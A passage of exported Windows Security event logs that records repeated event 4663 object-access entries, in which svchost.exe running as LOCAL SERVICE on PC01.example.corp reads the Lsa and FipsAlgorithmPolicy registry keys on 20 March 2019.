%%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452854 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452853 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452852 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x420 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452851 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x1ac + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452850 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x1ac + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452849 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x420 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452848 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x420 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452847 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x1ac + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452846 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452845 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x1ac + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452844 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452843 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452842 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452841 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452840 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452839 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452838 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452837 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452836 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452835 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452834 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452833 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452832 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452831 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452830 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452829 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452828 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452827 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452826 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.215261+04:00,1553038515.215261,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452825 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.215261+04:00,1553038515.215261,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452824 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.215261+04:00,1553038515.215261,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452823 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.205246+04:00,1553038515.205246,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452822 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.185218+04:00,1553038515.185218,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452821 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.185218+04:00,1553038515.185218,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452820 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.045016+04:00,1553038515.045016,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452819 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.045016+04:00,1553038515.045016,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452818 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:14.904814+04:00,1553038514.904814,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452817 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:14.904814+04:00,1553038514.904814,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452816 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:14.764613+04:00,1553038514.764613,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452815 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:14.764613+04:00,1553038514.764613,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452814 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:14.634426+04:00,1553038514.634426,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452813 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +1601-01-01T04:00:00+04:00,-11644473600.0,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452922 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x420 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.365477+04:00,1553038515.365477,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452921 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x1ac + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.365477+04:00,1553038515.365477,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452920 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x1ac + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.365477+04:00,1553038515.365477,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452919 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x420 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.365477+04:00,1553038515.365477,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452918 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x420 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL 